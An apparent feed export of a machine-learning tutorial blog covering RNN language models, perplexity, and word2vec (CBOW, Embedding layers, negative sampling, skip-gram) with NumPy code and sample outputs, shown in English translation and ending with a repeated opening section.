        for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads

    def forward(self, xs, ts):
        for layer in self.layers:
            xs = layer.forward(xs)
        loss = self.loss_layer.forward(xs, ts)
        return loss

    def backward(self, dout=1):
        dout = self.loss_layer.backward(dout)
        for layer in reversed(self.layers):
            dout = layer.backward(dout)
        return dout

    def reset_state(self):
        self.rnn_layer.reset_state()

5.5.2 Evaluating Language Models

**Perplexity** is commonly used as a metric of a language model's predictive performance. Perplexity represents the "reciprocal of the probability" (this interpretation is exact when the amount of data is 1).

"Model 1" predicts accurately and has a perplexity of 1.25; "Model 2" misses and has a perplexity of 5.0. The example shows that lower perplexity is better.

When there are multiple input data:

$$L=-\frac{1}{N}\sum_n\sum_k t_{nk}\log y_{nk},\qquad \mathrm{perplexity}=e^L$$

$N$: the amount of data

$t_n$: the correct-answer label in one-hot form

$t_{nk}$: the $k$-th value of the $n$-th datum

$y_{nk}$: the probability distribution (the network's Softmax output)
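A toy check of this formula with NumPy (3 samples, a 4-word vocabulary; the probabilities are made up):

import numpy as np

y = np.array([[0.6, 0.2, 0.1, 0.1],
              [0.1, 0.7, 0.1, 0.1],
              [0.25, 0.25, 0.25, 0.25]])  # softmax outputs
t = np.array([0, 1, 3])                   # correct word IDs
L = -np.mean(np.log(y[np.arange(3), t]))  # cross-entropy loss
print(np.exp(L))                          # perplexity, roughly 2.12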

5.5.3 Training Code for the RNNLM

Below we train on the PTB dataset, using only the first 1000 words of the PTB training data. This is because the RNNLM implemented in this section cannot obtain good results even with all of the training data.

import sys
sys.path.append('..')
import matplotlib.pyplot as plt
import numpy as np
from common.optimizer import SGD
from dataset import ptb


# set hyperparameters
batch_size = 10
wordvec_size = 100
hidden_size = 100
time_size = 5  # length of the Truncated BPTT window
lr = 0.1
max_epoch = 100

# load the training data (shrinking the dataset)
corpus, word_to_id, id_to_word = ptb.load_data('train')
corpus_size = 1000
corpus = corpus[:corpus_size]
vocab_size = int(max(corpus) + 1)

xs = corpus[:-1]  # inputs
ts = corpus[1:]   # outputs (supervised labels)
data_size = len(xs)
print('corpus size: %d, vocabulary size: %d' % (corpus_size, vocab_size))

# variables used during training
max_iters = data_size // (batch_size * time_size)
time_idx = 0
total_loss = 0
loss_count = 0
ppl_list = []

# create the model
model = SimpleRnnlm(vocab_size, wordvec_size, hidden_size)
optimizer = SGD(lr)

# compute the start position of each sample within a mini-batch
jump = (corpus_size - 1) // batch_size
offsets = [i * jump for i in range(batch_size)]

for epoch in range(max_epoch):
    for iter in range(max_iters):
        # fetch a mini-batch
        batch_x = np.empty((batch_size, time_size), dtype='i')
        batch_t = np.empty((batch_size, time_size), dtype='i')
        for t in range(time_size):
            for i, offset in enumerate(offsets):
                batch_x[i, t] = xs[(offset + time_idx) % data_size]
                batch_t[i, t] = ts[(offset + time_idx) % data_size]
            time_idx += 1

        # compute gradients and update the parameters
        loss = model.forward(batch_x, batch_t)
        model.backward()
        optimizer.update(model.params, model.grads)
        total_loss += loss
        loss_count += 1

    # evaluate perplexity once per epoch
    ppl = np.exp(total_loss / loss_count)
    print('| epoch %d | perplexity %.2f' % (epoch+1, ppl))
    ppl_list.append(float(ppl))
    total_loss, loss_count = 0, 0

# plot the result
x = np.arange(len(ppl_list))
plt.plot(x, ppl_list, label='train')
plt.xlabel('epochs')
plt.ylabel('perplexity')
plt.show()
corpus size: 1000, vocabulary size: 418
| epoch 1 | perplexity 381.82
| epoch 2 | perplexity 249.18
| epoch 3 | perplexity 221.29
| epoch 4 | perplexity 215.43
| epoch 5 | perplexity 207.15
...
| epoch 96 | perplexity 6.77
| epoch 97 | perplexity 6.63
| epoch 98 | perplexity 6.58
| epoch 99 | perplexity 6.19
| epoch 100 | perplexity 5.84

    png

5.5.4 A Trainer Class for the RNNLM

• Generate mini-batches in order

• Call the model's forward and backward passes

• Update the weights with the optimizer

• Evaluate perplexity

5.6 Summary

• An RNN has a loop, so it can keep a hidden state internally

• Unrolling the RNN's loop lets it be interpreted as many connected RNN layers, which can be trained with ordinary error backpropagation (= BPTT)

• When learning from long sequences, the data is cut into blocks of moderate length and BPTT is run block by block (= Truncated BPTT)

• Truncated BPTT cuts only the backward-pass connections

• With Truncated BPTT, the data must be fed in order so that the forward-pass connections are preserved

• A language model interprets a word sequence as a probability

• In theory, a conditional language model built from RNN layers can remember information about all the words seen so far

    ]]>
@@ -7955,7 +7955,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-4-word2vec%E9%AB%98%E9%80%9F%E5%8C%96/ - Main Text

4.1 Improving word2vec, Part 1

The CBOW model runs into problems when handling a large corpus.

Suppose the vocabulary has 1,000,000 words and the CBOW model's hidden layer has 100 neurons; the input and output layers then each contain 1,000,000 neurons. With this many neurons, the intermediate computations take a very long time.

The problems:

• The product of the input one-hot representations and the weight matrix $W_{in}$

  • With a vocabulary of 1,000,000 words, the one-hot representation alone occupies memory for 1,000,000 elements per word. On top of that, multiplying the one-hot vectors by the weight matrix $W_{in}$ consumes substantial compute as well.
    • Solved by introducing a new Embedding layer
• The product of the hidden layer and the weight matrix $W_{out}$, plus the Softmax computation

  • Multiplying the hidden layer by $W_{out}$ requires a lot of computation, and the cost of the Softmax layer also grows with the vocabulary

    • Solved by introducing a new loss function, Negative Sampling

4.1.1 The Embedding Layer

If the corpus vocabulary has 1,000,000 words, the one-hot representation of a word also has 1,000,000 dimensions, and we would have to multiply this huge vector by the weight matrix.

Intuitively, converting a word to a one-hot vector and then multiplying it through a MatMul layer seems unnecessary.

We create a layer that extracts "the row (vector) corresponding to a word ID" from the weight parameters; we call it the Embedding layer.

The Embedding layer stores word embeddings (distributed representations).

In natural language processing, dense vector representations of words are called word embeddings or distributed representations of words

4.1.2 Implementing the Embedding Layer

Extracting a row from a matrix is easy to implement. Suppose the weight W is a two-dimensional NumPy array; to take a particular row, simply write W[2] or W[5].

import numpy as np
W = np.arange(21).reshape(7, 3)
W
array([[ 0,  1,  2],
       [ 3,  4,  5],
       [ 6,  7,  8],
       [ 9, 10, 11],
       [12, 13, 14],
       [15, 16, 17],
       [18, 19, 20]])
W[2]
array([6, 7, 8])

Extracting several rows from the weight W at once is just as simple: pass an array of row indices.

idx = np.array([1, 0, 3, 0])
W[idx]
array([[ 3,  4,  5],
       [ 0,  1,  2],
       [ 9, 10, 11],
       [ 0,  1,  2]])

Implementing the Embedding layer's forward() and backward() methods:

class Embedding:
    def __init__(self, W):
        """
        Keep params and grads as member variables.
        """
        self.params = [W]
        self.grads = [np.zeros_like(W)]
        self.idx = None

    def forward(self, idx):
        """
        Store in the member variable idx the array of row indices
        (word IDs) to extract.
        During backpropagation, the gradient from the upstream
        (output-side) layer is passed through unchanged to the
        downstream (input-side) layer, except that it is applied
        only to the specific rows (idx) of the weight gradient dW.
        """
        W, = self.params
        self.idx = idx
        out = W[idx]
        return out

    def backward(self, dout):
        dW, = self.grads
        dW[...] = 0

        # dW[self.idx] = dout is a poor approach: when idx contains
        # duplicate elements, one written value overwrites the other.
        for i, word_id in enumerate(self.idx):
            dW[word_id] += dout[i]
        # or:
        # np.add.at(dW, self.idx, dout)
        return None
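The overwrite problem is easy to see with a toy example; np.add.at accumulates the duplicated rows, whereas fancy-index assignment silently drops one of the contributions:

import numpy as np

idx = np.array([0, 2, 0])         # index 0 appears twice
dout = np.ones((3, 3))

dW_bad = np.zeros((4, 3))
dW_bad[idx] = dout                # the second write to row 0 overwrites the first
dW_good = np.zeros((4, 3))
np.add.at(dW_good, idx, dout)     # duplicate indices are accumulated

print(dW_bad[0])                  # [1. 1. 1.]  one contribution lost
print(dW_good[0])                 # [2. 2. 2.]  both contributions kept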

4.2 Improving word2vec, Part 2

We adopt a method called **negative sampling** as the solution. Using Negative Sampling in place of Softmax keeps the amount of computation low and roughly constant, no matter how large the vocabulary grows.

4.2.1 The Computation Problem After the Hidden Layer

png

The input and output layers each have 1,000,000 neurons. In the previous section, introducing the Embedding layer removed the wasted computation in the input layer. What remains is the processing after the hidden layer, where two computations eat up time:

• The product of the hidden-layer neurons and the weight matrix ($W_{out}$)

  • The issue is the huge matrix product. In the example above, the hidden vector has size 100 and the weight matrix is 100 × 1,000,000; a matrix product this large takes a lot of time (and a lot of memory). Since the same computation is repeated in the backward pass, making this matrix product "lightweight" is well worth it.
• The Softmax computation

  • The cost of Softmax also grows with the vocabulary; it is proportional to the vocabulary size.

4.2.2 From Multi-class Classification to Binary Classification

Now let's consider how to turn the multi-class classification problem into binary classification. To do so, we look at a question answerable with "Yes/No". For example, ask the network "when the context is you and goodbye, is the target word say?"; the output layer then needs only one neuron, which can be viewed as outputting the score of say.

Since the output layer has a single neuron, computing the product of the hidden layer and the output-side weight matrix only requires extracting the column corresponding to say (its word vector) and taking its inner product with the hidden-layer neurons.

4.2.3 The Sigmoid Function and Cross-Entropy Error

In the multi-class case, the output layer uses the Softmax function to turn scores into probabilities, and the loss is the cross-entropy error. In the binary case, the output layer uses the sigmoid function, and the loss is again the cross-entropy error.

After the sigmoid function produces the probability $y$, the loss is computed from $y$. As in the multi-class case, the loss used with the sigmoid function is the cross-entropy error:

$$L=-(t\log y+(1-t)\log(1-y))$$

Here $y$ is the sigmoid output and $t$ is the correct label, taking the value 0 or 1: 1 means the answer is "Yes", 0 means "No". So when $t$ is 1 the loss is $-\log y$, and when $t$ is 0 it is $-\log (1-y)$.
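A quick numeric check of this loss (the score value is made up); a handy fact, used by the SigmoidWithLoss layer later, is that the gradient of this loss with respect to the score is simply $y-t$:

import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

score, t = 2.0, 1                  # score for "say", label Yes
y = sigmoid(score)                 # about 0.881
loss = -(t * np.log(y) + (1 - t) * np.log(1 - y))
print(y, loss)                     # about 0.881, 0.127
print(y - t)                       # gradient of the loss w.r.t. the score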

4.2.4 Implementing the Multi-class-to-Binary Conversion

We introduce an Embedding Dot layer, which merges the Embedding layer with the dot (inner product) computation.

class EmbeddingDot:
    def __init__(self, W):
        """
        params: the parameters
        grads: the gradients
        embed: the Embedding layer
        cache: stores intermediate results of the forward pass
        """
        self.embed = Embedding(W)
        self.params = self.embed.params
        self.grads = self.embed.grads
        self.cache = None

    def forward(self, h, idx):
        target_W = self.embed.forward(idx)
        out = np.sum(target_W * h, axis=1)
        self.cache = (h, target_W)
        return out

    def backward(self, dout):
        h, target_W = self.cache
        dout = dout.reshape(dout.shape[0], 1)
        dtarget_W = dout * h
        self.embed.backward(dtarget_W)
        dh = dout * target_W
        return dh
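A quick shape check of the layer above (assuming the Embedding and EmbeddingDot classes are in scope): each row of h is paired with one target word ID and reduced to a single score:

import numpy as np

W = np.arange(21).reshape(7, 3).astype('f')
layer = EmbeddingDot(W)
h = np.random.randn(2, 3)     # mini-batch of 2 hidden vectors
idx = np.array([1, 4])        # target word IDs
out = layer.forward(h, idx)   # [dot(h[0], W[1]), dot(h[1], W[4])]
print(out.shape)              # (2,)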

4.2.5 Negative Sampling

png

So far we have trained only on positive examples (correct answers); we do not yet know how the model behaves on negative examples (wrong answers).

The current network has learned only the positive example say and knows nothing about the words other than say.

What we really want is this: for the positive example (say), drive the Sigmoid layer's output toward 1; for negative examples (words other than say), drive it toward 0.

Do we then need to train on every negative example? Clearly "No": using all negative examples would blow the computation up to an unmanageable size (and the whole point of this chapter is to cope with a growing vocabulary). Instead, as an approximation, we select a small number of negative examples (say 5 or 10; how to select them is described below). That is, we use only a few negatives. This is what "negative sampling" means.

4.2.6 The Sampling Method for Negative Sampling

Derive a probability distribution from each word's frequency in the corpus, and then simply sample from that distribution. Sampling this way means words that appear often in the corpus are easy to draw, while "rare words" are seldom drawn.

Illustrating probability-based sampling in Python:

# pick one number at random from 0 to 9
np.random.choice(10)
4
# pick one element at random from the words list
words = ['you', 'say', 'goodbye', 'I', 'hello', '.']
np.random.choice(words)
'goodbye'
# sample 5 times with replacement
np.random.choice(words, size=5)
array(['you', '.', 'say', 'hello', 'say'], dtype='<U7')
# sample 5 times without replacement
np.random.choice(words, size=5, replace=False)
array(['goodbye', 'I', 'say', 'you', 'hello'], dtype='<U7')
# sample according to a probability distribution
p = [0.5, 0.1, 0.05, 0.2, 0.05, 0.1]
np.random.choice(words, p=p)
'I'

The negative sampling proposed in word2vec adds one more step to this distribution: as shown below, the original probabilities are raised to the 0.75th power.

$$P'(w_i)=\frac{P(w_i)^{0.75}}{\sum^n_j P(w_j)^{0.75}}$$

This is done so that low-frequency words are not abandoned. More precisely, raising to the 0.75th power slightly increases the probability of low-frequency words.

    p = [0.7, 0.29, 0.01]
    new_p = np.power(p, 0.75)
    new_p /= np.sum(new_p)
    print(new_p)
    [0.64196878 0.33150408 0.02652714]

In this example, an element whose probability was 0.01 (1%) before the transformation becomes 0.026… (2.6…%) after it. In this way, raising to the 0.75th power acts as a rescue measure that makes low-frequency words slightly easier to draw.

There is no theoretical basis for the value 0.75; other values can be used.

corpus = np.array([0, 1, 2, 3, 4, 1, 2, 3])
power = 0.75
sample_size = 2
# get_negative_sample() treats the word IDs given by target as
# positive examples and samples other word IDs as negatives.
sampler = UnigramSampler(corpus, power, sample_size)
target = np.array([1, 3, 0])
negative_sample = sampler.get_negative_sample(target)
print(negative_sample)

4.2.7 Implementing Negative Sampling

class NegativeSamplingLoss:
    def __init__(self, W, corpus, power=0.75, sample_size=5):
        self.sample_size = sample_size
        self.sampler = UnigramSampler(corpus, power, sample_size)
        self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size + 1)]
        self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size + 1)]
        self.params, self.grads = [], []
        for layer in self.embed_dot_layers:
            self.params += layer.params
            self.grads += layer.grads

    def forward(self, h, target):
        """
        h: the hidden-layer neurons
        target: the positive-example targets
        """
        batch_size = target.shape[0]
        # sample negatives with self.sampler and store them in negative_sample
        negative_sample = self.sampler.get_negative_sample(target)

        # forward pass for the positive example
        score = self.embed_dot_layers[0].forward(h, target)
        correct_label = np.ones(batch_size, dtype=np.int32)  # label for positives is 1
        loss = self.loss_layers[0].forward(score, correct_label)

        # forward pass for the negative examples
        negative_label = np.zeros(batch_size, dtype=np.int32)  # label for negatives is 0
        for i in range(self.sample_size):
            negative_target = negative_sample[:, i]
            score = self.embed_dot_layers[1 + i].forward(h, negative_target)
            loss += self.loss_layers[1 + i].forward(score, negative_label)

        return loss

    def backward(self, dout=1):
        dh = 0
        for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):
            # just call each layer's backward() in the reverse
            # order of the forward pass
            dscore = l0.backward(dout)
            dh += l1.backward(dscore)
        return dh

4.3 Training the Improved word2vec

4.3.1 Implementing the CBOW Model

    png

import sys
sys.path.append('..')
from common.np import *  # import numpy as np
from common.layers import Embedding
from ch04.negative_sampling_layer import NegativeSamplingLoss


class CBOW:
    def __init__(self, vocab_size, hidden_size, window_size, corpus):
        V, H = vocab_size, hidden_size

        # initialize the weights
        W_in = 0.01 * np.random.randn(V, H).astype('f')
        W_out = 0.01 * np.random.randn(V, H).astype('f')

        # create the layers
        self.in_layers = []
        for i in range(2 * window_size):
            layer = Embedding(W_in)  # use Embedding layers
            self.in_layers.append(layer)
        self.ns_loss = NegativeSamplingLoss(W_out, corpus, power=0.75, sample_size=5)

        # collect all weights and gradients into lists
        layers = self.in_layers + [self.ns_loss]
        self.params, self.grads = [], []
        for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

        # keep the distributed representations as a member variable
        self.word_vecs = W_in

    def forward(self, contexts, target):
        h = 0
        for i, layer in enumerate(self.in_layers):
            h += layer.forward(contexts[:, i])
        h *= 1 / len(self.in_layers)
        loss = self.ns_loss.forward(h, target)
        return loss

    def backward(self, dout=1):
        dout = self.ns_loss.backward(dout)
        dout *= 1 / len(self.in_layers)
        for layer in self.in_layers:
            layer.backward(dout)
        return None

4.3.2 Training Code for the CBOW Model

import sys
sys.path.append('..')
import numpy as np
from common import config
# When running on a GPU, enable the line below (requires cupy)
# ===============================================
config.GPU = True
# ===============================================
import pickle
from common.trainer import Trainer
from common.optimizer import Adam
from common.util import create_contexts_target, to_cpu, to_gpu
from dataset import ptb

# set hyperparameters
window_size = 5
hidden_size = 100
batch_size = 100
max_epoch = 10

# load the data
corpus, word_to_id, id_to_word = ptb.load_data('train')
vocab_size = len(word_to_id)

contexts, target = create_contexts_target(corpus, window_size)
if config.GPU:
    contexts, target = to_gpu(contexts), to_gpu(target)

# create the model, optimizer and trainer
model = CBOW(vocab_size, hidden_size, window_size, corpus)
optimizer = Adam()
trainer = Trainer(model, optimizer)

# start training
trainer.fit(contexts, target, max_epoch, batch_size)
trainer.plot()

# save what is needed for later use
word_vecs = model.word_vecs
if config.GPU:
    word_vecs = to_cpu(word_vecs)
params = {}
params['word_vecs'] = word_vecs.astype(np.float16)
params['word_to_id'] = word_to_id
params['id_to_word'] = id_to_word
pkl_file = 'cbow_params.pkl'
with open(pkl_file, 'wb') as f:
    pickle.dump(params, f, -1)

4.3.3 Evaluating the CBOW Model

import sys
sys.path.append('..')
from common.util import most_similar
import pickle

pkl_file = 'cbow_params.pkl'
with open(pkl_file, 'rb') as f:
    params = pickle.load(f)
    word_vecs = params['word_vecs']
    word_to_id = params['word_to_id']
    id_to_word = params['id_to_word']

querys = ['you', 'year', 'car', 'toyota']
for query in querys:
    most_similar(query, word_to_id, id_to_word, word_vecs, top=5)

4.4 Other Topics Around word2vec

4.4.1 Applications of word2vec

In natural language processing, distributed representations of words matter above all because of transfer learning: knowledge learned in one domain can be applied in other domains.

Converting words and documents into fixed-length vectors is extremely important, because once natural language is turned into vectors, ordinary machine learning methods (neural networks, SVMs, and so on) can be applied

png

4.4.2 Evaluating Word Vectors

Word similarity is usually evaluated against human-curated word-similarity datasets: for example, the similarity between cat and animal is 8, between cat and car is 2, and so on, with humans scoring word pairs on a 0-10 scale. One then compares the human scores with word2vec's cosine similarities and examines their correlation.

4.5 Summary

• The Embedding layer stores the distributed representations of words and, in the forward pass, extracts the vector corresponding to each word ID

• Because word2vec's computation grows in proportion to the vocabulary, approximate computation should be used to speed it up

• Negative sampling draws a handful of negative examples, which lets the multi-class problem be handled as binary classification

• The distributed representations produced by word2vec encode word meaning; words used in similar contexts end up close together in the word-vector space

• One property of word2vec's distributed representations is that analogy problems can be solved with vector addition and subtraction

• Transfer learning is a key strength of word2vec: its word representations can be reused across all kinds of NLP tasks

    ]]>
@@ -7982,7 +7982,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-3-word2vec/ - Main Text

3.1 Inference-Based Methods and Neural Networks

Research on representing words as vectors:

• counting-based methods

• inference-based methods

The two differ greatly in how they obtain word meaning, but both rest on the distributional hypothesis.

3.1.1 Problems with Counting-Based Methods

For an $n\times n$ matrix, SVD has complexity $O(n^3)$: the computation grows with the cube of $n$. A cost this large is beyond even a supercomputer. In practice, approximations and sparse-matrix properties can speed things up somewhat, but the method still demands enormous compute and time.

png

3.1.2 Overview of Inference-Based Methods

The central operation of inference-based methods is "inference": given the surrounding words (the context), predict which word appears at the "?" position.

png

3.1.3 How Neural Networks Process Words

We will process words with a neural network. But a neural network cannot handle words like you or say directly; to process words with a neural network, they must first be converted to fixed-length vectors. One way is the one-hot representation (one-hot vectors), in which a single element is 1 and all the others are 0.

import numpy as np

c = np.array([[1, 0, 0, 0, 0, 0, 0]])  # input
W = np.random.randn(7, 3)              # weights
h = np.dot(c, W)                       # intermediate node
print(h)
[[-0.7200455  -0.12248471 -0.19002763]]

    png

3.2 A Simple word2vec

As the neural network we use the **continuous bag-of-words (CBOW)** model proposed in the original word2vec.

3.2.1 Inference with the CBOW Model

png

The hidden-layer neurons are the "average" of the values obtained by passing each input layer through the fully connected layer.

After the fully connected transformation, the 1st input layer becomes $h_1$ and the 2nd becomes $h_2$; the hidden-layer neurons are then $\frac{1}{2}(h_1+h_2)$.

The transformation from the input layer to the hidden layer is done by a fully connected layer (with weights $W_{in}$). Here the weight $W_{in}$ is a $7\times 3$ matrix. Spoiler: this weight is exactly the distributed representation of the words that we are after. Vectors obtained this way encode word meaning remarkably well. That is the whole picture of word2vec.

import sys
sys.path.append('..')
import numpy as np
from common.layers import MatMul

# context data for the sample
c0 = np.array([[1, 0, 0, 0, 0, 0, 0]])
c1 = np.array([[0, 0, 1, 0, 0, 0, 0]])

# initial values of the weights
W_in = np.random.randn(7, 3)
W_out = np.random.randn(3, 7)

# create the layers
in_layer0 = MatMul(W_in)
in_layer1 = MatMul(W_in)
out_layer = MatMul(W_out)

# forward pass
h0 = in_layer0.forward(c0)
h1 = in_layer1.forward(c1)
h = 0.5 * (h0 + h1)
s = out_layer.forward(h)

print(s)
[[-1.6202109   0.75824908 -0.05364709 -0.39814822 -0.37373042  0.51207421   0.8510953 ]]

The CBOW model is a simple network structure that uses no activation functions.

3.2.2 Training the CBOW Model

png

The context is you and goodbye, and the correct label (the word the network should predict) is say. If the network has "good weights", then among the neurons representing probabilities, the one corresponding to the correct answer should score highest.

Training the CBOW model means adjusting the weights so that the predictions become accurate. As a result, the weights $W_{in}$ (strictly speaking, both $W_{in}$ and $W_{out}$) learn vectors that capture word-occurrence patterns.

Training just uses the Softmax function and the cross-entropy error: first convert the scores to probabilities with Softmax, then take the cross-entropy error between those probabilities and the supervised labels, and use it as the loss.

3.2.3 word2vec's Weights and Distributed Representations

The network used in word2vec has two sets of weights: the input-side fully connected layer's weights ($W_{in}$) and the output-side fully connected layer's weights ($W_{out}$).

In general, each row of the input-side weights $W_{in}$ corresponds to one word's distributed representation. The output-side weights $W_{out}$ likewise store vectors that encode word meaning.

3.3 Preparing the Training Data

3.3.1 Contexts and Target Words

png

The input to word2vec's network is the contexts, and its correct labels are the words surrounded by those contexts, i.e. the target words.

We take each word in the corpus as a target and extract its surrounding words as the context. Doing this for every word in the corpus (except the words at both ends) yields contexts and target.

Converting the corpus text into word IDs

    import sys
    sys.path.append('..')
    from common.util import preprocess

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    print(corpus)
    print(id_to_word)
[0 1 2 3 4 1 5 6]
{0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}

Implementing a function that generates contexts and target words

def create_contexts_target(corpus, window_size=1):
    """
    corpus: list of word IDs
    window_size: size of the context window
    return: contexts and target as NumPy arrays
    """
    # As for the targets: target[0] holds the 0th target word,
    # target[1] holds the 1st target word, and so on.
    target = corpus[window_size:-window_size]
    # contexts is a two-dimensional array whose 0th axis holds the
    # individual context data: contexts[0] holds the 0th context,
    # contexts[1] holds the 1st context, and so on.
    contexts = []

    for idx in range(window_size, len(corpus)-window_size):
        cs = []
        for t in range(-window_size, window_size + 1):
            if t == 0:
                continue
            cs.append(corpus[idx + t])
        contexts.append(cs)
    return np.array(contexts), np.array(target)

contexts, target = create_contexts_target(corpus, window_size=1)

print(contexts)
[[0 2]
 [1 3]
 [2 4]
 [3 1]
 [4 5]
 [1 6]]

We have now generated contexts and target words from the corpus; all that remains is to feed them to the CBOW model. However, since the elements of these contexts and targets are still word IDs, they must also be converted to the one-hot representation.

3.3.2 Converting to One-hot Representations

    png

    import sys
    sys.path.append('..')
    from common.util import preprocess, create_contexts_target, convert_one_hot

    text = 'You say goodbye and I say hello.'

    corpus, word_to_id, id_to_word = preprocess(text)

    contexts, target = create_contexts_target(corpus, window_size=1)

    vocab_size = len(word_to_id)
    target = convert_one_hot(target, vocab_size)
    contexts = convert_one_hot(contexts, vocab_size)

3.4 Implementing the CBOW Model

    png

import sys
sys.path.append('..')
import numpy as np
from common.layers import MatMul, SoftmaxWithLoss

class SimpleCBOW:
    def __init__(self, vocab_size, hidden_size):
        """
        vocab_size: number of words in the vocabulary
        hidden_size: number of neurons in the hidden layer
        """
        V, H = vocab_size, hidden_size

        # initialize the weights
        W_in = 0.01 * np.random.randn(V, H).astype('f')  # use 32-bit floats
        W_out = 0.01 * np.random.randn(H, V).astype('f')

        # create the layers
        self.in_layer0 = MatMul(W_in)
        self.in_layer1 = MatMul(W_in)
        self.out_layer = MatMul(W_out)
        self.loss_layer = SoftmaxWithLoss()

        # collect all weights and gradients into lists
        layers = [self.in_layer0, self.in_layer1, self.out_layer]
        self.params, self.grads = [], []
        for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

        # keep the distributed representations as a member variable
        self.word_vecs = W_in

    def forward(self, contexts, target):
        """
        The network's forward pass: takes contexts and target
        and returns the loss.
        """
        h0 = self.in_layer0.forward(contexts[:, 0])
        h1 = self.in_layer1.forward(contexts[:, 1])
        h = (h0 + h1) * 0.5
        score = self.out_layer.forward(h)
        loss = self.loss_layer.forward(score, target)
        return loss

    def backward(self, dout=1):
        """
        The backward pass.
        """
        ds = self.loss_layer.backward(dout)
        da = self.out_layer.backward(ds)
        da *= 0.5
        self.in_layer1.backward(da)
        self.in_layer0.backward(da)
        return None

Implementing the training

Training the CBOW model is exactly the same as training an ordinary neural network: prepare the training data, then compute gradients and update the weight parameters step by step.

    import sys
    sys.path.append('..')
    from common.trainer import Trainer
    from common.optimizer import Adam
    from common.util import preprocess, create_contexts_target, convert_one_hot

    window_size = 1
    hidden_size = 5
    batch_size = 3
    max_epoch = 1000

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)

    vocab_size = len(word_to_id)
    contexts, target = create_contexts_target(corpus, window_size)
    target = convert_one_hot(target, vocab_size)
    contexts = convert_one_hot(contexts, vocab_size)

    model = SimpleCBOW(vocab_size, hidden_size)
    optimizer = Adam()
    trainer = Trainer(model, optimizer)
    trainer.fit(contexts, target, max_epoch, batch_size)
    trainer.plot()

    png

Inspecting the learned weight parameters

word_vecs = model.word_vecs
for word_id, word in id_to_word.items():
    print(word, word_vecs[word_id])
you [-0.9274265  -0.91214865 -0.9109259   0.8992449  -1.6783223 ]
say [ 1.1131934  1.0601219  1.1271317 -1.1453978 -1.2170266]
goodbye [-0.9434733  -0.9451493  -1.0034578   1.0183493   0.01961206]
and [ 0.68801135  1.3125733   0.7976222  -0.66661966 -1.7473713 ]
i [-0.9705925  -0.96961325 -1.0059276   1.0296363   0.02202316]
hello [-0.9177436  -0.9189522  -0.90853983  0.89148486 -1.6829524 ]
. [ 1.2674404   0.2086714   1.1918164  -1.3567644   0.25613624]

The small corpus used here does not produce good results, mainly, of course, because the corpus is too small. With a larger, more realistic corpus the results should improve, but then new problems appear in processing speed, because this CBOW implementation has several efficiency problems.

3.5 Notes on word2vec

3.5.1 The CBOW Model and Probability

The probability that the target is $w_t$ given the contexts $w_{t-1}$ and $w_{t+1}$, written as a posterior probability:

$$P(w_t|w_{t-1},w_{t+1})$$

The CBOW model's loss function is just the $\log$ of this probability with the sign flipped; this is also known as the negative log likelihood:

$$L=-\log P(w_t|w_{t-1}, w_{t+1})$$

The formula above is the loss for a single sample. Extending it to the whole corpus:

$$L=-\frac{1}{T}\sum^T_{t=1}\log P(w_t|w_{t-1}, w_{t+1})$$

3.5.2 The skip-gram Model

png

skip-gram is the model obtained by swapping the contexts and target handled by the CBOW model.

• The CBOW model predicts the middle word (the target) from the multiple words of its context

• The skip-gram model predicts the multiple surrounding words (the context) from the middle word (the target)

skip-gram can be modeled as:

$$P(w_{t-1}, w_{t+1}|w_t)$$

"the probability that $w_{t-1}$ and $w_{t+1}$ occur together, given $w_t$".

Assuming the context words are conditionally independent:

$$P(w_{t-1},w_{t+1}|w_t)=P(w_{t-1}|w_t)P(w_{t+1}|w_t)$$

Substituting into the cross-entropy loss yields the skip-gram model's loss function:

$$L=-\frac{1}{T}\sum^T_{t=1}(\log P(w_{t-1}|w_t) + \log P(w_{t+1}|w_t))$$

3.5.3 Counting-Based vs. Inference-Based

• Counting-based methods learn distributed representations of words in one pass over the statistics of the whole corpus

• Inference-based methods learn by repeatedly looking at parts of the corpus (mini-batch learning)

After word2vec, researchers proposed GloVe, which fuses the inference-based and counting-based approaches. Its idea is to fold the statistics of the whole corpus into the loss function and train with mini-batches (see the paper for details). In this way the two methodologies were successfully merged.

    3.6 小结

    • 基于推理的方法以预测为目标,同时获得了作为副产物的单词的分布式表示

    • word2vec 是基于推理的方法,由简单的 2 层神经网络构成

    • word2vec 有 skip-gram 模型和 CBOW 模型

    • CBOW 模型从多个单词(上下文)预测 1 个单词(目标词)

    • skip-gram 模型反过来从 1 个单词(目标词)预测多个单词(上下文)

    • 由于 word2vec 可以进行权重的增量学习,所以能够高效地更新或添加单词的分布式表示

    ]]>
Main text

3.1 Inference-based methods and neural networks

Research on representing words with vectors:

• count-based methods

• inference-based methods

The two differ greatly in how they obtain word meanings, but both rest on the distributional hypothesis.

3.1.1 Problems with count-based methods

For an $n\times n$ matrix, SVD has complexity $O(n^3)$: the computation grows with the cube of $n$. A cost this large is beyond even a supercomputer. In practice, approximation methods and the sparsity of the matrix can speed things up somewhat, but large amounts of computing resources and time are still required.

(figure)

3.1.2 Overview of inference-based methods

The main operation of an inference-based method is "inference": given the surrounding words (the context), predict which word appears at "?".

(figure)

3.1.3 Handling words in a neural network

We will use a neural network to process words. A neural network, however, cannot handle words like you or say directly: to process words, they must first be converted into fixed-length vectors. One way to do this is the one-hot representation (one-hot vectors), in which a single element is 1 and all other elements are 0.

import numpy as np

c = np.array([[1, 0, 0, 0, 0, 0, 0]])  # input (one-hot)
W = np.random.randn(7, 3)               # weights
h = np.dot(c, W)                        # hidden-layer node
print(h)
[[-0.7200455  -0.12248471 -0.19002763]]

(figure)

3.2 A simple word2vec

